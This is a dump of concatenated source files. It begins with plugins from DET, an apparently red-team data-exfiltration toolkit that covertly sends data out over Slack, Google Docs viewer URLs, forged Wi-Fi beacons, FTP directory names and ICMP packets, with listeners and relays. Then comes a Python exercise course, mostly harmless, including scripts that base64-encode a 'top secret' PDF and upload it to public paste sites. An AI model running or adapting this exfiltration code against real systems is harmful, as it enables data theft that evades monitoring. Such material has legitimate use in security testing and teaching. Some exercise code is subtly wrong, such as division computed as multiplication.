if addr[0] == target:
app_exfiltrate.log_message('info', "[proxy] [sip] Relaying data to {0}".format(target))
sock.sendto(data, (sender, port))
else:
app_exfiltrate.log_message('info', "[proxy] [sip] Relaying data to {0}".format(sender))
sock.sendto(data, (target, port))
except:
print(traceback.format_exc())
class Plugin:
def __init__(self, app, conf):
global app_exfiltrate, config
app_exfiltrate = app
config = conf
app.register_plugin('sip', {'send': send, 'listen': listen, 'proxy': proxy})
|
NickFleece/DET | plugins/slack.py | from slackclient import SlackClient
import time
app_exfiltrate = None
config = None
sc = None
def send(data):
global sc
chan = config['chan_id']
app_exfiltrate.log_message('info', "[slack] Sending {} bytes with Slack".format(len(data)))
data = data.encode('hex')
sc.api_call("api.text")
sc.api_call("chat.postMessage", as_user="true:", channel=chan, text=data)
def listen():
app_exfiltrate.log_message('info', "[slack] Listening for messages")
if sc.rtm_connect():
while True:
try:
raw_data = sc.rtm_read()[0]
if 'text' in raw_data:
app_exfiltrate.log_message('info', "[slack] Receiving {} bytes with Slack".format(len(raw_data['text'])))
app_exfiltrate.retrieve_data(raw_data['text'].decode('hex'))
except:
pass
time.sleep(1)
else:
app_exfiltrate.log_message('warning', "Connection Failed, invalid token?")
def proxy():
app_exfiltrate.log_message('info', "[proxy] [slack] proxy mode unavailable (useless) for Slack plugin")
class Plugin:
def __init__(self, app, conf):
global app_exfiltrate, config, sc
sc = SlackClient(conf['api_token'])
config = conf
app.register_plugin('slack', {'send': send, 'listen': listen, 'proxy': proxy})
app_exfiltrate = app
|
NickFleece/DET | plugins/google_docs.py | <filename>plugins/google_docs.py
import requests
import base64
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urllib
config = None
app_exfiltrate = None
def send(data):
target = "https://docs.google.com/viewer?url=http://{}:{}/{}".format(config['target'], config['port'], urllib.quote_plus(base64.b64encode(data)))
app_exfiltrate.log_message(
'info', "[http] Sending {0} bytes to {1}".format(len(data), target))
requests.get(target)
def listen():
app_exfiltrate.log_message('info', "[Google docs] Listen mode not implemented")
def proxy():
app_exfiltrate.log_message('info', "[proxy] [Google docs] proxy mode not implemented")
class Plugin:
def __init__(self, app, conf):
global app_exfiltrate, config
config = conf
app_exfiltrate = app
app.register_plugin('google_docs', {'send': send, 'listen': listen, 'proxy': proxy})
|
NickFleece/DET | plugins/wifi.py | from __future__ import print_function
try:
from scapy.all import *
except:
print("You should install Scapy if you run the server..")
config = None
app_exfiltrate = None
ap_list = []
ap_buffer = []
job_id = None
def PacketHandler(pkt):
global ap_buffer, job_id
if pkt.haslayer(Dot11):
if pkt.type == 00 and pkt.subtype == 8:
if pkt.addr2 not in ap_list:
ap_list.append(pkt.addr2)
print("AP MAC: {} with SSID: {}".format(pkt.addr2, pkt.info))
try:
data = pkt.info.decode('hex')
if len(ap_buffer) == 0:
job_id = data[:7]
print("job_id : {}".format(job_id))
ap_buffer.append(data)
print(ap_buffer)
try:
data_to_exfil = ''.join(ap_buffer)
print("data_to_exfil = {}".format(data_to_exfil))
if len(pkt.info) < 30:
data_to_exfil = ''.join(ap_buffer)
app_exfiltrate.retrieve_data(data_to_exfil)
ap_buffer = []
elif data_to_exfil.count(job_id) == 2:
packet_exfil = job_id + data_to_exfil.split(job_id)[0]
app_exfiltrate.retrieve_data(packet_exfil)
ap_buffer = data_to_exfil.split(packet_exfil, '')
except Exception as err:
print(err)
pass
except Exception as err:
print(err)
pass
def send(data):
# data = data.encode('hex')
while data != "":
tmp = data[:15]
data = data.replace(tmp, '')
tmp = tmp.encode('hex')
app_exfiltrate.log_message('info', "[wifi] Sending {0} on {1}".format(tmp, config['interface']))
netSSID = tmp #Network name here
iface = str(config['interface']) #Interface name here
dot11 = Dot11(type=0, subtype=8, addr1=RandMAC(),
addr2=RandMAC(), addr3=RandMAC())
beacon = Dot11Beacon(cap='ESS+privacy')
essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID))
rsn = Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' #RSN Version 1
'\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
'\x02\x00' #2 Pairwise Cipher Suites (next two lines)
'\x00\x0f\xac\x04' #AES Cipher
'\x00\x0f\xac\x02' #TKIP Cipher
'\x01\x00' #1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' #Pre-Shared Key
'\x00\x00')) #RSN Capabilities (no extra capabilities)
frame = RadioTap()/dot11/beacon/essid/rsn
# frame.show()
# print("\nHexdump of frame:")
# hexdump(frame)
sendp(frame, iface=iface, inter=1)
def listen():
print(config['interface'])
app_exfiltrate.log_message('info', "[wifi] Waiting for Wi-Fi probe on {}".format(config['interface']))
sniff(iface=str(config['interface']), prn=PacketHandler)
# sniff(iface="wlan1mon", prn=PacketHandler)
class Plugin:
def __init__(self, app, conf):
global config
global app_exfiltrate
config = conf
app_exfiltrate = app
app.register_plugin('wifi', {'send': send, 'listen': listen})
|
NickFleece/DET | plugins/ftp.py | <reponame>NickFleece/DET<gh_stars>100-1000
import logging
from ftplib import FTP
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
from pyftpdlib.authorizers import DummyAuthorizer
from random import choice
import base64
app_exfiltrate = None
config = None
user = "user"
passwd = "<PASSWORD>"
class CustomFTPHandler(FTPHandler):
def ftp_MKD(self, path):
app_exfiltrate.log_message('info', "[ftp] Received MKDIR query from {}".format(self.addr))
data = str(path).split('/')[-1]
if self.handler == "retrieve":
app_exfiltrate.retrieve_data(base64.b64decode(data))
elif self.handler == "relay":
relay_ftp_mkdir(data)
# Recreate behavior of the original ftp_MKD function
line = self.fs.fs2ftp(path)
self.respond('257 "%s" directory created.' % line.replace('"', '""'))
return path
def send(data):
if config.has_key('proxies') and config['proxies'] != [""]:
targets = [config['target']] + config['proxies']
target = choice(targets)
else:
target = config['target']
port = config['port']
try:
ftp = FTP()
ftp.connect(target, port)
ftp.login(user, passwd)
except:
pass
try:
ftp.mkd(base64.b64encode(data))
except:
pass
def relay_ftp_mkdir(data):
target = config['target']
port = config['port']
app_exfiltrate.log_message('info', "[proxy] [ftp] Relaying MKDIR query to {}".format(target))
try:
ftp = FTP()
ftp.connect(target, port)
ftp.login(user, passwd)
except:
pass
try:
ftp.mkd(data)
except:
pass
def init_ftp(data_handler):
logging.basicConfig(filename="/dev/null", format="", level=logging.INFO)
port = config['port']
authorizer = DummyAuthorizer()
authorizer.add_user(user, passwd, homedir="/tmp", perm='elradfmw')
handler = CustomFTPHandler
handler.authorizer = authorizer
handler.handler = data_handler
server = FTPServer(('', port), handler)
server.serve_forever()
def listen():
app_exfiltrate.log_message('info', "[ftp] Listening for FTP requests")
init_ftp("retrieve")
def proxy():
app_exfiltrate.log_message('info', "[proxy] [ftp] Listening for FTP requests")
init_ftp("relay")
class Plugin:
def __init__(self, app, conf):
global app_exfiltrate, config
app_exfiltrate = app
config = conf
app.register_plugin('ftp', {'send': send, 'listen': listen, 'proxy': proxy})
|
NickFleece/DET | plugins/icmp.py | <gh_stars>100-1000
import base64
import socket
from random import choice, randint
from dpkt import ip, icmp
config = None
app_exfiltrate = None
def send_icmp(dst, data):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
except:
app_exfiltrate.log_message('warning', "ICMP plugin requires root privileges")
sys.exit()
ip_dst = socket.gethostbyname(dst)
echo = icmp.ICMP.Echo()
echo.id = randint(0, 0xffff)
echo.seq = 1
echo.data = data
icmp_pkt = icmp.ICMP()
icmp_pkt.type = icmp.ICMP_ECHO
icmp_pkt.data = echo
try:
s.sendto(icmp_pkt.pack(), (ip_dst, 0))
except:
app_exfiltrate.log_message('warning', "ICMP plugin requires root privileges")
pass
s.close()
def send(data):
if config.has_key('proxies') and config['proxies'] != [""]:
targets = [config['target']] + config['proxies']
target = choice(targets)
else:
target = config['target']
data = base64.b64encode(data)
app_exfiltrate.log_message(
'info', "[icmp] Sending {0} bytes with ICMP packet to {1}".format(len(data), target))
send_icmp(target, data)
def listen():
app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
# Filter for echo requests only to prevent capturing generated replies
sniff(handler=analyze)
def sniff(handler):
""" Sniffs packets and looks for icmp requests """
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
sock.bind(('', 1))
while True :
try:
data = sock.recv(65535)
ip_pkt = ip.IP()
ip_pkt.unpack(data)
icmp_pkt = ip_pkt.data
if icmp_pkt.type == icmp.ICMP_ECHO:
ip_src = socket.inet_ntoa(ip_pkt.src)
ip_dst = socket.inet_ntoa(ip_pkt.dst)
payload = icmp_pkt.data.data
handler(payload, ip_src, ip_dst)
except:
sock.close()
def analyze(payload, src, dst):
try:
app_exfiltrate.log_message(
'info', "[icmp] Received ICMP packet from {0} to {1}".format(src, dst))
app_exfiltrate.retrieve_data(base64.b64decode(payload))
except:
pass
def relay_icmp_packet(payload, src, dst):
target = config['target']
try:
app_exfiltrate.log_message(
'info', "[proxy] [icmp] Relaying icmp packet to {0}".format(target))
send_icmp(target, payload)
except:
pass
def proxy():
app_exfiltrate.log_message(
'info', "[proxy] [icmp] Listening for icmp packets")
sniff(handler=relay_icmp_packet)
class Plugin:
def __init__(self, app, conf):
global app_exfiltrate, config
app_exfiltrate = app
config = conf
app.register_plugin('icmp', {'send': send, 'listen': listen, 'proxy': proxy})
|
dggsoares/Simple_Python_Exercises | python_101/02.2 - ascii_art.py | <gh_stars>1-10
stormtrooper = r'''
,ooo888888888888888oooo,
o8888YYYYYY77iiiiooo8888888o
8888YYYY77iiYY8888888888888888
[88YYY77iiY88888888888888888888]
88YY7iYY888888888888888888888888
[88YYi 88888888888888888888888888]
i88Yo8888888888888888888888888888i
i] ^^^88888888^^^ o [i
oi8 i o8o i 8io
,77788o ^^ ,oooo8888888ooo, ^ o88777,
7777788888888888888888888888888888877777
77777888888888888888888888888888877777
77777788888888^7777777^8888888777777
,oooo888 ooo 88888778888^7777ooooo7777^8887788888 ,o88^^^^888oo
o8888777788[];78 88888888888888888888888888888888888887 7;8^ 888888888oo^88
o888888iii788 ]; o 78888887788788888^;;^888878877888887 o7;[]88888888888888o
88888877 ii78[]8;7o 7888878^ ^8788^;;;;;;^878^ ^878877 o7;8 ]878888888888888
[88888888887888 87;7oo 777888o8888^;ii;;ii;^888o87777 oo7;7[]8778888888888888
88888888888888[]87;777oooooooooooooo888888oooooooooooo77;78]88877i78888888888
o88888888888888 877;7877788777iiiiiii;;;;;iiiiiiiii77877i;78] 88877i;788888888
88^;iiii^88888 o87;78888888888888888888888888888888888887;778] 88877ii;7788888
;;;iiiii7iiii^ 87;;888888888888888888888888888888888888887;778] 888777ii;78888
;iiiii7iiiii7iiii77;i88888888888888888888i7888888888888888877;77i 888877777ii78
iiiiiiiiiii7iiii7iii;;;i7778888888888888ii7788888888888777i;;;;iiii 88888888888
i;iiiiiiiiiiii7iiiiiiiiiiiiiiiiiiiiiiiiii8877iiiiiiiiiiiiiiiiiii877 88888
ii;;iiiiiiiiiiiiii;;;ii^^^;;;ii77777788888888888887777iii;; 77777 78
77iii;;iiiiiiiiii;;;ii;;;;;;;;;^^^^8888888888888888888777ii;; ii7 ;i78
^ii;8iiiiiiii ';;;;ii;;;;;;;;;;;;;;;;;;^^oo ooooo^^^88888888;;i7 7;788
o ^;;^^88888^ 'i;;;;;;;;;;;;;;;;;;;;;;;;;;;^^^88oo^^^^888ii7 7;i788
88ooooooooo ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 788oo^;; 7;i888
887ii8788888 ;;;;;;;ii;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;^87 7;788
887i8788888^ ;;;;;;;ii;;;;;;;oo;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,,, ;;888
87787888888 ;;;;;;;ii;;;;;;;888888oo;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,,;i788
87i8788888^ ';;;ii;;;;;;;8888878777ii8ooo;;;;;;;;;;;;;;;;;;;;;;;;;;i788 7
77i8788888 ioo;;;;;;oo^^ooooo ^7i88^ooooo;;;;;;;;;;;;;;;;;;;;i7888 78
7i87788888o 7;ii788887i7;7;788888ooooo7888888ooo;;;;;;;;;;;;;;oo ^^^ 78
i; 7888888^ 8888^o;ii778877;7;7888887;;7;7788878;878;; ;;;;;;;i78888o ^
i8 788888 [88888^^ ooo ^^^^^;;77888^^^^;;7787^^^^ ^^;;;; iiii;i78888888
^8 7888^ [87888 87 ^877i;i8ooooooo8778oooooo888877ii; iiiiiiii788888888
^^^ [7i888 87;; ^8i;;i7888888888888888887888888 i7iiiiiii88888^^
87;88 o87;;;;o 87i;;;78888788888888888888^^ o 8ii7iiiiii;;
87;i8 877;77888o ^877;;;i7888888888888^^ 7888 78iii7iii7iiii
^87; 877;778888887o 877;;88888888888^ 7ii7888 788oiiiiiiiii
^ 877;7 7888888887 877i;;8888887ii 87i78888 7888888888
[87;;7 78888888887 87i;;888887i 87ii78888 7888888888]
877;7 7788888888887 887i;887i^ 87ii788888 78888888888
87;i8 788888888888887 887ii;;^ 87ii7888888 78888888888
[87;i8 7888888888888887 ^^^^ 87ii77888888 78888888888
87;;78 7888888888888887ii 87i78888888 778888888888
87;788 7888888888888887i] 87i78888888 788888888888
[87;88 778888888888888887 7ii78888888 788888888888
87;;88 78888888888888887] ii778888888 78888888888]
7;;788 7888888888888888] i7888888888 78888888888'
7;;788 7888888888888888 'i788888888 78888888888
7;i788 788888888888888] 788888888 77888888888]
'7;788 778888888888888] [788888888 78888888888'
';77888 78888888888888 8888888888 7888888888]
778888 78888888888888 8888888888 7888888888]
78888 7888888888888] [8888888888 7888888888
7888 788888888888] 88888888888 788888888]
778 78888888888] ]888888888 778888888]
oooooo ^88888^ ^88888^^^^^^^^8888]
87;78888ooooooo8o ,oooooo oo888oooooo
[877;i77888888888] [;78887i8888878i7888;
^877;;ii7888ii788 ;i777;7788887787;778;
^87777;;;iiii777 ;77^^^^^^^^^^^^^^^^;;
^^^^^^^^^ii7] ^ o88888888877iiioo
77777o [88777777iiiiii;;778
77777iii 8877iiiii;;;77888888]
77iiii;8 [77ii;778 788888888888
7iii;;88 iii;78888 778888888888
77i;78888] ;;;;i88888 78888888888
,7;78888888 [;;i788888 7888888888]
i;788888888 ;i7888888 7888888888
;788888888] i77888888 788888888]
';88888888' [77888888 788888888]
[[8ooo88] 78888888 788888888
[88888] 78888888 788888888
^^^ [7888888 77888888]
88888888 7888887
77888888 7888887
;i88888 788888i
,;;78888 788877i7
,7;;i;777777i7i;;7
87778^^^ ^^^^87778
^^^^ o777777o ^^^
o77777iiiiii7777o
7777iiii88888iii777
;;;i7778888888877ii;;
Imperial Stormtrooper [i77888888^^^^8888877i]
(Standard Shock Trooper) 77888^oooo8888oooo^8887]
[788888888888888888888888]
88888888888888888888888888
]8888888^iiiiiiiii^888888]
<NAME> iiiiiiiiiiiiiiiiiiiiii
^^^^^^^^^^^^^
------------------------------------------------
Thank you for visiting https://asciiart.website/
This ASCII pic can be found at
https://asciiart.website/index.php?art=movies/star%20wars
''' |
dggsoares/Simple_Python_Exercises | python_101/12.2 - sockets_server.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
HOST = '127.0.0.1'
PORT = 45001
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
print(f'Server listening on port: {PORT}...')
s.listen()
conn, addr = s.accept()
print('Connected by', addr)
conn.sendall('Hello Human!'.encode()) |
dggsoares/Simple_Python_Exercises | python_101/01.2 - float.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('Basic float operations')
a = 2.3
b = 3.4
addition = a + b
subtraction = a - b
multiplication = a * b
division = a * b
modulo = a % b
print(f'a = {a}')
print(f'b = {b}')
print(f'a + b = {addition}')
print(f'a - b = {subtraction}')
print(f'a * b = {multiplication}')
print(f'a / b = {division}')
print(f'a % b = {modulo}')
print('\nRound float')
x = 14.78945121
print(f'x = {x}')
print(f'x = {round(x, 2)}')
print('x = %.2f' % x)
|
dggsoares/Simple_Python_Exercises | python_101/11 - import_system.py | <filename>python_101/11 - import_system.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os.path
import datetime
from math import cos
import math as mathematics
from requests import get as get_http
from oop_python import Robot
print(f'Current working directory: {os.getcwd()}')
print(f'Current time: {datetime.datetime.now()}')
print(f'Cosine : {cos(12345)}')
print(f'π = {mathematics.pi}')
print(f'HTTP Status code: {get_http("https://www.google.com").status_code}')
robot_1 = Robot('Bob', 'red')
robot_1.walk()
robot_1.talk()
robot_1.stop() |
dggsoares/Simple_Python_Exercises | python_201/08 - perl_nopaste.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64
import json
from bs4 import BeautifulSoup
requests.packages.urllib3.disable_warnings() # Disable SSL verify warnings
URL = 'http://paste.arn-fai.net/'
FILENAME_INPUT = 'top_secret_document.pdf'
FILENAME_OUTPUT = 'top_secret_document_decoded.pdf'
with open(FILENAME_INPUT, 'rb') as file_input, open(FILENAME_OUTPUT, 'wb') as file_output:
print(f'[XXX] Sending File [XXX]')
print(f'\t[+] Reading {FILENAME_INPUT}')
encoded_file = base64.b64encode(file_input.read())
print(f'\t[+] {FILENAME_INPUT} encoded in Base64')
#POST request
data = {
"insert": 1,
"name": "blackhat",
"expires": "1w",
"language": "Plain",
"description": "Testing service",
"code": encoded_file
}
r = requests.post(URL, data=data, verify=False)
soup = BeautifulSoup(r.text, 'html.parser')
links = soup.find_all('a')
print(f'\t[+] Link: {links[0].get("href")}')
print(f'\t[+] Raw file link: {links[1].get("href")}')
print(f'\n[XXX] Retrieving File [XXX]')
r = requests.get(links[1].get("href"), verify=False)
print(f'\t[+] Fetching {links[1].get("href")}')
print(f'\t[+] Decoding in Base64')
decoded_file = base64.b64decode(r.text)
print(f'\t[+] Writing in file {FILENAME_OUTPUT}')
file_output.write(decoded_file)
print(f'\t[+] Done!!!')
|
dggsoares/Simple_Python_Exercises | python_101/07 - for_statements.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('Number sequence: ')
for number in [1, 2, 3, 4, 5, 6]:
print(number)
print('\nNumber sequence with range(): ')
for number in range(1, 7):
print(number)
print('\nIterating over sequence')
print('Names:')
names = ['Bob', 'Maroon', 'Damian']
for name in names:
print('\t' + name)
print('\nIterating over sequence with enumerate()')
print('Names:')
for index, name in enumerate(names):
print(f'\t{index} : {name}') |
dggsoares/Simple_Python_Exercises | python_101/04 - dictionaries.py | <filename>python_101/04 - dictionaries.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('Python dictionaries')
dict0 = {}
dict1 = dict(a=1, b=-2, c=3, d=4, e=5)
dict2 = dict(
one=1,
two=2,
three=3,
four=4,
five=5
)
dict3 = {
'one': 1,
'two': 2,
'three': 3,
'four': 4,
'five': 5
}
dict4 = {'name': 'Bob', 'last_name': 'Williams', 'age': 16}
print(dict0)
print(dict1)
print(dict2)
print(dict3)
print(f'Customer name: {dict4["name"]}, Last Name: {dict4["last_name"]} Age: {dict4["age"]}')
print('name' in dict4)
print('Bob' in dict4.values())
print(dict4.values())
print(dict4.items()) |
dggsoares/Simple_Python_Exercises | python_201/10 - self_signed_cert.py | from datetime import datetime, timedelta
from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.x509.oid import NameOID
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
CERT_FILE = "cert.pem"
KEY_FILE = "key.pem"
def create_self_signed_cert():
key = rsa.generate_private_key(
public_exponent=65537,
key_size=4096,
backend=default_backend()
)
# create a self-signed cert
name = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, 'localhost')
])
now = datetime.utcnow()
cert = (
x509.CertificateBuilder()
.subject_name(name)
.issuer_name(name)
.serial_number(1000)
.not_valid_before(now)
.not_valid_after(now + timedelta(days=10 * 365))
.public_key(key.public_key())
.sign(key, hashes.SHA256(), default_backend())
)
with open(CERT_FILE, "wb") as output_cert:
output_cert.write(cert.public_bytes(encoding=serialization.Encoding.PEM))
with open(KEY_FILE, "wb") as output_key:
output_key.write(key.private_bytes(encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption())
)
create_self_signed_cert()
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_23.py | <gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet
def create_key(password):
salt = b'\<KEY>' # os.random(16)
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=100000,
backend=default_backend()
)
key = base64.urlsafe_b64encode(kdf.derive(password))
return key
def main():
password = '<PASSWORD>'
key = create_key(password.encode())
#Files names
file_name = 'top_secret_document.pdf'
encrypted_file_name = 'top_secret_document_fernet_encrypted'
# Encrypt file
with open(file_name, 'rb') as file_input, open(encrypted_file_name, 'wb') as file_output:
file_output.write(Fernet(key).encrypt(file_input.read()))
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | python_201/04 - xor_encryption.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import string
import random
def generate_key(length):
characters = string.ascii_letters + string.punctuation
return ''.join((random.choice(characters) for _ in range(length)))
def xor(message, key):
return "".join([chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(message, key)])
def main():
print(f'[+++] Simple XOR Encryption/Decryption [+++]')
message = input(' [X] Message to encrypt: ')
key = generate_key(len(message))
encrypted_message = xor(message, key)
decrypted_message = xor(encrypted_message, key)
print(f'\t [|] Key: {key[:25]}')
print(f'\t [|] Key size: {len(key)}')
print(f'\t [|] Message: {message}')
print(f'\t [|] Encrypted message: {encrypted_message}')
print(f'\t [|] Decrypted message: {decrypted_message}')
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | python_101/12.1 - sockets.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
HOST = '127.0.0.1'
PORT = 45001
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
data = s.recv(1024).decode()
print(data) |
dggsoares/Simple_Python_Exercises | exercises_answer/ex_22-1.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64
def xor(message, key):
return "".join([chr(ord(c1) ^ ord(c2)) for c1, c2 in zip(message, key)])
URL = "http://localhost:3321"
key = 'PythonOffensive201#@113445'
r = requests.get(URL)
encoded_message = base64.b64decode(r.content)
decrypted_message = xor(encoded_message.decode(), key)
print(f'Received message : {r.content}')
print(f'Decrypted message : {decrypted_message}')
|
dggsoares/Simple_Python_Exercises | exercises_answer/ex_23-2.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet
def create_key(password):
salt = b'\<KEY>' # os.random(16)
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=100000,
backend=default_backend()
)
key = base64.urlsafe_b64encode(kdf.derive(password))
return key
def main():
password = '<PASSWORD>'
key = create_key(password.encode())
#Files names
encrypted_file_name = 'top_secret_document_fernet_encrypted'
decrypted_file_name = 'top_secret_document_fernet_decrypted.pdf'
# Decrypt file
with open(encrypted_file_name, 'rb') as file_input, open(decrypted_file_name, 'wb') as file_output:
file_output.write(Fernet(key).decrypt(file_input.read()))
if __name__ == '__main__':
main()
|
dggsoares/Simple_Python_Exercises | python_101/10 - file_operations.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('[+] First Read')
with open('file.txt', 'r') as file:
print(file.read())
print('\n[+] Second Read')
with open('file.txt', 'r') as file:
while True:
line = file.readline()
print(line, end='')
if not line:
break
print('\n\n[+] Third Read')
with open('file.txt', 'r') as file:
for line in file:
print(line, end='')
print('\n\n[+] First Writing')
with open('file_output.txt', 'w') as file_output:
data_to_write = 'Some text\n' * 100
file_output.write(data_to_write)
print('\t[|] Done writing file!')
data = {'ip': '127.0.0.1'}
print('\n\n[+] Second Writing')
with open('file_output_dict.txt', 'w') as file_output_dict:
file_output_dict.write(str(data))
print('\t[|] Done writing dict to a file!')
print('\n\n[+] Reading and Writing')
with open('file.txt', 'r') as file_input, open('file_output_2.txt', 'w') as file_output:
file_output.write(file_input.read())
print('\t[|] Done copying files!') |
dggsoares/Simple_Python_Exercises | python_201/06.1 - fernet_encryption.py | <reponame>dggsoares/Simple_Python_Exercises
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cryptography.fernet import Fernet
print(f'[+++] Fernet Encryption/Decryption tool [+++]')
message = "I turned my phone on airplane mode and threw it in the air. Worst transformer ever."
print(f'\t[|] Message to encrypt: {message}')
key = Fernet.generate_key()
print(f'\t[|] Fernet key: {key}')
cipher_suite = Fernet(key)
cipher_text = cipher_suite.encrypt(message.encode())
print(f'\t[|] Message encrypted: {cipher_text.decode()}')
plain_text = cipher_suite.decrypt(cipher_text)
print(f'\t[|] Message decrypted: {plain_text.decode()}') |
dggsoares/Simple_Python_Exercises | exercises_answer/ex_16_client.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
HOST = 'py.insidertips.xyz'
PORT = 30045
def do_math(a, b, operator):
if operator == '+':
return str(a + b).encode()
elif operator == '-':
return str(a - b).encode()
elif operator == '*':
return str(a * b).encode()
elif operator == '/':
return str(a / b).encode()
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
# Banner
print(s.recv(1024).decode())
# First response
# Raw data
print('[+] First response')
raw_data = s.recv(1024).decode()
print(f'[+] Raw data: {raw_data}')
# Split data
split_data = raw_data.split('&')
print(f'[+] Split data: {split_data}')
a = int(split_data[0])
b = int(split_data[1])
operator = split_data[2]
first_response = do_math(a, b, operator)
s.send(first_response)
print(f'[+] First reponse: {first_response}\n')
# Second response
# Raw data
print('[+] Second response')
raw_data = s.recv(1024).decode()
print(f'[+] Raw data: {raw_data}')
# Split data
split_data = raw_data.split('&')
print(f'[+] Split data: {split_data}')
a = int(split_data[0])
b = int(split_data[1])
operator = split_data[2]
second_response = do_math(a, b, operator)
s.send(second_response)
print(f'[+] Second reponse: {second_response}\n')
# Third response
# Raw data
print('[+] Third response')
raw_data = s.recv(1024).decode()
print(f'[+] Raw data: {raw_data}')
# Split data
split_data = raw_data.split('&')
print(f'[+] Split data: {split_data}')
a = int(split_data[0])
b = int(split_data[1])
operator = split_data[2]
third_response = do_math(a, b, operator)
s.send(third_response)
print(f'[+] Third response: {third_response}\n')
# Correct message
data = s.recv(1024).decode()
print(data)
|
dggsoares/Simple_Python_Exercises | python_101/01.3 - booleans.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
print('Booleans type') # True or False
print(f'True equals {int(True)} int number')
print(f'False equals {int(False)} int number')
print(f'1 evaluate to: {bool(1)}')
print(f'And so every non-zero number: {bool(-45)}')
print(f'0 evaluate to: {bool(0)}')
print('Logic operators') # AND, OR, NOT
print(f'not True: {not True}')
print(f'not False: {not False}')
print(f'True and True: {True and True}')
print(f'False or True: {False or True}')
|
dggsoares/Simple_Python_Exercises | python_101/01.1 - integer.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Comments on Python!
'''
Multi
Lines
Comments
on
Python
'''
print('Basic integer operations')
a = 4
b = 5
addition = a + b
subtraction = a - b
multiplication = a * b
division = a * b
modulo = a % b
print(f'a = {a}')
print(f'b = {b}')
print(f'a + b = {addition}')
print(f'a - b = {subtraction}')
print(f'a * b = {multiplication}')
print(f'a / b = {division}')
print(f'a % b = {modulo}')
print('\nInteger Comparison')
print(f'11 > 15 = {11 > 15}')
print(f'11 < 15 = {11 < 15}')
print(f'11 <= 15 = {11 <= 15}')
print(f'11 >= 15 = {11 >= 15}')
print(f'11 == 15 = {11 == 15}')
print(f'11 != 15 = {11 != 15}')
|
dggsoares/Simple_Python_Exercises | python_201/07 - hastebin.py | <reponame>dggsoares/Simple_Python_Exercises<filename>python_201/07 - hastebin.py<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import base64
import json
requests.packages.urllib3.disable_warnings() # Disable SSL verify warnings
URL = 'https://hastebin.com/documents/'
FILENAME_INPUT = 'top_secret_document.pdf'
FILENAME_OUTPUT = 'top_secret_document_decoded.pdf'
with open(FILENAME_INPUT, 'rb') as file_input, open(FILENAME_OUTPUT, 'wb') as file_output:
print(f'[XXX] Sending File [XXX]')
print(f'\t[+] Reading {FILENAME_INPUT}')
encoded_file = base64.b64encode(file_input.read())
print(f'\t[+] {FILENAME_INPUT} encoded in Base64')
r = requests.post(URL, data=encoded_file, verify=False)
link_file = json.loads(r.text)
print(f'\t[+] Or this link: {"".join(URL.split("d")[:1]) + link_file["key"]}')
print(f'\t[+] Access this link: {URL + link_file["key"]}')
print(f'\n[XXX] Retrieving File [XXX]')
r = requests.get(URL + link_file["key"], verify=False)
print(f'\t[+] Fetching {URL + link_file["key"]}')
file_encoded = json.loads(r.text)
print(f'\t[+] Decoding in Base64')
decoded_file = base64.b64decode(file_encoded['data'])
print(f'\t[+] Writing in file {FILENAME_OUTPUT}')
file_output.write(decoded_file)
print(f'\t[+] Done!!!')
|
dggsoares/Simple_Python_Exercises | python_101/03 - lists.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
list1 = []
print(list1)
list2 = list()
print(list2)
